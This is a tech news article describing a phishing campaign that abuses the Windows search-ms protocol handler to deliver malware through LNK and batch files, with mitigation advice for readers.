Hackers are hijacking Windows Search to hit victims with malware

News
By published

"Clever" but "low-volume" campaign was recently spotted hijacking Windows Search

A fish hook is lying across a computer keyboard, representing a phishing attack on a computer system
(Image credit: weerapatkiatdumrong / Getty Images)

Experts have discovered a low-volume, but very clever, cybercrime campaign abusing the Windows search functionality to trick victims into downloading malware.

The campaign was discovered by cybersecurity researchers from Trustwave SpiderLabs, who described it as both “clever” and being low in volume.

“This technique cleverly obscures the attacker’s true intent, exploiting the trust users place in familiar interfaces and common actions like opening email attachments,” the researchers said in their write-up

Be wary of your inbox

The attack starts with a phishing email pretending to be an invoice, or something similar. It carries a .ZIP archive of an HTML file, and thus successfully bypasses antivirus and email security programs that overlook compressed contents.

The HTML file opens up the browser and forces it to directly interact with Windows Explorer’s search function. In turn, Windows Explorer is tasked with searching for items labeled as “INVOICE”, in a specific directory - a server tunneled via Cloudflare. Furthermore, the search is renamed to “Downloads”, ultimately tricking victims into thinking they were actually looking at the file they “downloaded”, and not the .ZIP archive.

Among the files then presented to the victims is a shortcut document (.LNK) that points to a batch script (.BAT) hosted on the same server. This script, if activated, triggers additional malicious operations.

Unfortunately, by the time they started analyzing the campaign, the server was shut down, preventing the researchers from obtaining the payload. Therefore, it is impossible to know what kind of malware the attackers were distributing.

To mitigate the threat, users could disable search-ms/search URI protocol handlers by deleting associated registry entries. 

Alternatively, they should be wary of incoming emails carrying attachments: “As users continue to navigate an increasingly complex threat landscape, ongoing education, and proactive security strategies remain paramount in safeguarding against such deceptive tactics,” the researchers concluded.

More from TechRadar Pro

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

Read more
DeepSeek
Fake DeepSeek installers are infecting your device with dangerous malware
A digital representation of a lock
Security experts are being targeted with fake malware discoveries
Trojan
Hackers hide malware into website images to go unnoticed
Pirate skull cyber attack digital technology flag cyber on on computer CPU in background. Darknet and cybercrime banner cyberattack and espionage concept illustration.
Criminals are using a virtual hard disk image file to host and distribute dangerous malware
A hacker typing on a MacBook laptop with code on the screen.
This devious phishing site repurposes legitimate web elements like CAPTCHA pages for malware distribution
Representational image of a cybercriminal
Criminals are spreading malware disguised as DeepSeek AI
Latest in Security
Microsoft
"Another pair of eyes" - Microsoft launches all-new Security Copilot Agents to give security teams the upper hand
Lock on Laptop Screen
Medusa ransomware is able to disable anti-malware tools, so be on your guard
An abstract image of digital security.
Fake file converters are stealing info, pushing ransomware, FBI warns
Insecure network with several red platforms connected through glowing data lines and a black hat hacker symbol
Coinbase targeted after recent Github attacks
hacker.jpeg
Key trusted Microsoft platform exploited to enable malware, experts warn
IBM office logo
IBM to provide platform for flagship cyber skills programme for girls
Latest in News
Microsoft
"Another pair of eyes" - Microsoft launches all-new Security Copilot Agents to give security teams the upper hand
Cassian Andor looking nervously over his shoulder in Andor season 2
New Andor season 2 trailer has got Star Wars fans asking the same question – and it includes an ominous call back to Rogue One's official teaser
Ncuti Gatwa as The Fifteenth Doctor in Doctor Who
Disney+ drops new trailer for Doctor Who season 2 that promises an epic adventure across time and space
23andMe
23andMe is bankrupt and about to sell your DNA, here's how to stop that from happening
A phone showing a ChatGPT app error message
ChatGPT was down for many – here's what happened
AirPods Max with USB-C in every color
Apple's AirPods Max with USB-C will get lossless audio in April, but you'll need to go wired
More about security
An abstract image of digital security.

Fake file converters are stealing info, pushing ransomware, FBI warns
Microsoft

"Another pair of eyes" - Microsoft launches all-new Security Copilot Agents to give security teams the upper hand
A close up of a xenomorph with Earth reflected on its head in the Alien: Earth TV show teaser

Disney+ celebrates 5 years of streaming with 2025 lookahead – here are 3 movies and shows I can't wait to watch
See more latest
Most Popular
Shape of Russia filled with Russian flag-colored internet codes on a black hacking background
A new wave of blocks in Russia targets VPN apps and Cloudflare subnets
An abstract image of digital security.
Fake file converters are stealing info, pushing ransomware, FBI warns
Microsoft
"Another pair of eyes" - Microsoft launches all-new Security Copilot Agents to give security teams the upper hand
Ncuti Gatwa as The Fifteenth Doctor in Doctor Who
Disney+ drops new trailer for Doctor Who season 2 that promises an epic adventure across time and space
Cassian Andor looking nervously over his shoulder in Andor season 2
New Andor season 2 trailer has got Star Wars fans asking the same question – and it includes an ominous call back to Rogue One's official teaser
23andMe
23andMe is bankrupt and about to sell your DNA, here's how to stop that from happening
Lock on Laptop Screen
Medusa ransomware is able to disable anti-malware tools, so be on your guard
hacker.jpeg
Key trusted Microsoft platform exploited to enable malware, experts warn
A screenshot from Indiana Jones and the Great Circle showing Indiana Jones
Indiana Jones and the Great Circle finally gets PS5 release date and I can't wait to don the fedora and crack the whip
NYT Strands homescreen on a mobile phone screen, on a light blue background
NYT Strands hints and answers for Tuesday, March 25 (game #387)